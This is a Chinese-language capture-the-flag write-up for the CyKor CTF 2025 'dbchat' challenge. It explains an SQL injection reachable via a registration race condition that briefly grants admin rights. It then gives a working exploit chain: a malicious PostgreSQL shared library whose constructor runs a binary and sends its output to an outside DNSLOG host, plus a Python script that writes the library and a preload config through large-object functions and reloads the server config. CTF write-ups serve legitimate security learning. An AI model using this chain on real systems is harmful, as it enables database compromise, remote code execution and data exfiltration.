CyKor CTF 2025 dbchat wp
最近事情有点多,上线写了一题就去忙其他的了(
dbchat
def _generate_sql(self, prompt: str) -> (str, List):
m = self._pattern.match(prompt)
if not m:
return None
field = m.group("field").lower()
name = m.group("name").strip()
if field not in self.ALLOWED_FIELDS:
return None
sql = f"SELECT {field} FROM people WHERE name='{name}';"
return sql
这里明显可以sql注入
但是需要admin权限
@app.route('/register', methods=['GET', 'POST'])
def register():
if request.method == 'POST':
data = request.get_json() or {}
username = data.get('username', '')
pw1 = data.get('password', '')
pw2 = data.get('confirm_password', '')
role = data.get('role', '')
if not username:
return jsonify(success=False, message='Please enter your ID'), 400
if load_user(username):
return jsonify(success=False, message='The ID is already in use'), 400
if not pw1 or not pw2:
return jsonify(success=False, message='Please enter your password'), 400
if pw1 != pw2:
return jsonify(success=False, message='Password does not match'), 400
if role == 'admin':
return jsonify(success=False, message='role can not be admin'), 400
pw_hash = hash_password(pw1)
save_user(username, pw_hash)
msg = get_msg(username)
rank = get_username_rank(username)
ROLE.insert(rank, role)
MSG.insert(rank, msg)
return jsonify(success=True, message='Registration successful! Please log in.'), 201
但这里存在一个条件竞争问题
如果注册一个用户,用户的json会被立刻写进文件,但是此时ROLE 列表可能并未更新
def get_username_rank(username):
username = str(username)
files = [f for f in os.listdir(USERS_DIR) if f.endswith('.json')]
files.sort()
my_file = f"{username}.json"
if my_file not in files:
return None
rank = files.index(my_file)
return rank
这里的get_username_rank基于文件系统,如果让rank刚好为原来admin的rank但是ROLE 未更新,这时候可以短暂拥有admin权限
然后就是必须getshell才能读取flag
RUN gcc -o flag flag.c
RUN rm flag.c
RUN chmod 0111 flag
考虑写入并加载恶意so
#include "postgres.h"
#include "fmgr.h"
#include <stdlib.h>
#include <unistd.h>
#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif
void __attribute__((constructor)) init() {
unsetenv("LD_PRELOAD");
system("python3 -c \\"import subprocess, urllib.request, urllib.parse; flag = subprocess.check_output('/app/flag').decode().strip(); data = urllib.parse.urlencode({'flag': flag}); urllib.request.urlopen('<http://DNSLOG/?'> + data)\\"");
system("/app/flag > /app/users/flag");
}
这里因为依赖问题,加载so后数据库可能崩溃,所以选择直接将flag发送出去
编译
gcc -I$(pg_config --includedir-server) -fPIC -shared -o hack.so hack.c
xxd -p hack.so | tr -d '\\n' > hack.hex
然后向/etc/postgresql/17/main/conf.d/写入配置文件
内容为
session_preload_libraries = '/app/users/hack.so'然后用pg_reload_conf()重载配置
搓一个自动化脚本
import requests
import threading
import time
BASE_URL = "<http://localhost:5000>"
ANSWER = "no"
def register_thread(username, password):
try:
requests.post(f"{BASE_URL}/register", json={
"username": username,
"password": password,
"confirm_password": password,
"role": "user"
})
except:
pass
def attack_thread(username, password, paylaod):
global ANSWER
s = requests.Session()
login_url = f"{BASE_URL}/login"
chat_url = f"{BASE_URL}/admin/chat"
login_data = {"username": username, "password": password}
chat_data = {"question": paylaod}
start_time = time.time()
while time.time() - start_time < 10:
if ANSWER != "no":
return
try:
login_resp = s.post(login_url, json=login_data)
if login_resp.status_code == 200:
chat_resp = s.post(chat_url, json=chat_data, allow_redirects=False)
if chat_resp.status_code == 200:
try:
res_json = chat_resp.json()
answer = res_json.get('answer', '')
print("ANSWER: " + answer)
ANSWER = answer
except:
pass
elif chat_resp.status_code == 302:
pass
except Exception as e:
pass
def attack(payload,username):
password = "password123"
payload = f"what is location of ' UNION ALL SELECT {payload} WHERE '1'='1 ?"
t_att = threading.Thread(target=attack_thread, args=(username, password, payload))
t_att.daemon = True
t_att.start()
time.sleep(1)
t_reg = threading.Thread(target=register_thread, args=(username, password))
t_reg.daemon = True
t_reg.start()
t_reg.join()
t_att.join(timeout=2)
if __name__ == "__main__":
with open("hack.hex") as f:
hex = f.read()
attack(f"lo_from_bytea(0, decode('{hex}', 'hex'))::text", "000")
if ANSWER == "no":
print("failed 1")
exit(1)
OID = ANSWER
ANSWER = "no"
attack(f"lo_export({OID}, '/app/users/hack.so')::text", "001")
ANSWER = "no"
attack("lo_from_bytea(0, decode('73657373696f6e5f7072656c6f61645f6c6962726172696573203d20272f6170702f75736572732f6861636b2e736f270a', 'hex'))::text", "002")
if ANSWER == "no":
print("failed 3")
exit(1)
OID = ANSWER
ANSWER = "no"
attack(f"lo_export({OID}, '/etc/postgresql/17/main/conf.d/zzz_hack.conf')::text", "003")
if ANSWER == "no":
print("failed 4")
exit(1)
ANSWER = "no"
attack("pg_reload_conf()::text", "004")
ANSWER = "no"
attack("pg_read_file('/app/users/flag')::text", "005")
然后flag会被发送到DNSLOG平台
许可协议:
CC BY 4.0